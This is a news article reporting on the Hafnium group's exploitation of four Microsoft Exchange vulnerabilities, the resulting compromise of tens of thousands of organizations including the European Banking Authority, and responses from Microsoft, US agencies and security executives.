At least 30,000 U.S. organizations are victims of an unusually aggressive Chinese cyber-espionage unit exploiting vulnerabilities in Microsoft Exchange mail Server software.
The previously unknown state-sponsored Chinese hackers identified as “Hafnium” were exploiting four vulnerabilities CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, whose discovery was credited to a Virginia-based cybersecurity firm Volexity.
The researchers found that the Chinese hackers were silently exploiting the bugs at least by Jan 6, 2021. Although Microsoft released an emergency patch to prevent further exploitation, evicting a persistent threat actor was difficult.
Chinese hackers escalated the cyber espionage campaign to target more organizations
Microsoft earlier said that the threat actors targeted email systems used by infectious disease researchers, law firms, NGOs, defense contractors, higher education institutions, and policy think tanks.
However, cybersecurity experts discovered that the Chinese hackers escalated their cyber-espionage campaign by scanning the internet for vulnerable and unpatched MS Exchange servers online.
Anonymous sources in contact with U.S. national security advisors told KrebsOnSecurity that Chinese hackers had already seized hundreds of thousands of Exchange mail servers globally. The Chinese hackers left indicators of compromise (IoC), which includes an internet-reachable, password-protected web shell on each compromised email server.
Microsoft released a statement indicating that it was working with government agencies, including the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (DHS-CISA), and other security agencies to address the threat. CISA directed all federal agencies using Microsoft Exchange email servers to update or disconnect from the federal networks.
White House press secretary Jen Psaki noted that the Chinese hackers posed a significant threat, and the cyber espionage campaign could have far-reaching effects. She added that the “large number of victims” compromised by the cyber espionage campaign was worrying.
Former CISA director Chris Krebs noted that more victims were likely. An anonymous source who spoke to KrebsOnSecurity said that the cleanup process involving tens of thousands of victims would not be enormous. The National Security Adviser Jake Sullivan said they were “closely tracking” the cyber espionage campaign for potentially compromising defense industrial base entities.
Other security researchers, including Microsoft’s Kevin Beaumont, released tools for detecting hackers’ activities on compromised servers.
European Union banking regulator’s email servers breached by Chinese hackers
Other entities outside the United States have also acknowledged being victims of the Chinese hackers’ cyber espionage campaign. The European Banking Authority (EBA) admitted that it was the subject of a cyber-attack against its Microsoft Exchange Servers.
The regulator said that the compromise related to the “EBA’s email servers, access to personal data through emails held on that servers may have been obtained by the attacker.”
EBA disclosed that it took its email systems offline as a precautionary measure but was working to restore full functionality for its system.
Several hours later, the European Union body released a statement explaining that “no data extraction has been performed and we have no indication to think that the breach has gone beyond our email servers.”
“The exploitation of the 0days in question required some specific conditions (e.g. user account on the vulnerable system) and thus raises questions what exactly happened at EBA,” wonders Ilia Kolochenko, CEO at ImmuniWeb. “Another key question is when exactly EBA was compromised. If the intrusion had happened prior to the public disclosure of the vulnerability, it was just possible to do some system hardening and continuous monitoring for network anomalies – to prevent 0day exploitation – or at least to detect it in a timely manner.”
Kolochenko noted that EBA would hardly public agency affected by the cyber espionage campaign as more public authorities would discover being victims of exploitation through vulnerable Microsoft Exchange servers. Thus, he underscored the need for proper technical investigation before attributing an attack.
It’s also probable that the Chinese hackers will expand their attack vectors, while other threat actors will exploit the vulnerability to install backdoors for delivering malware and ransomware.
Microsoft executive Tom Burt already predicted that other nation-state actors and criminal groups would rush to exploit the vulnerability.
“It is, unfortunately, no surprise that the scope of the recent Microsoft Exchange exploit has continued to grow substantially,” says Saryu Nayyar, CEO, Gurucul. “While there are still thousands of organizations worldwide that operate an on-premises instance of Exchange, the painful truth is that many of those users lack the resources to properly protect or maintain them.”
Nayyar added that the compromise was one of those “Stop what you are doing and fix this now!” events and organizations had no choice but patch the systems.
“Perhaps worse, even for organizations that have recently patched, there will be a period of uncertainty while they confirm their system wasn’t compromised or scrub their own environment to find anything an attacker may have done if it was.”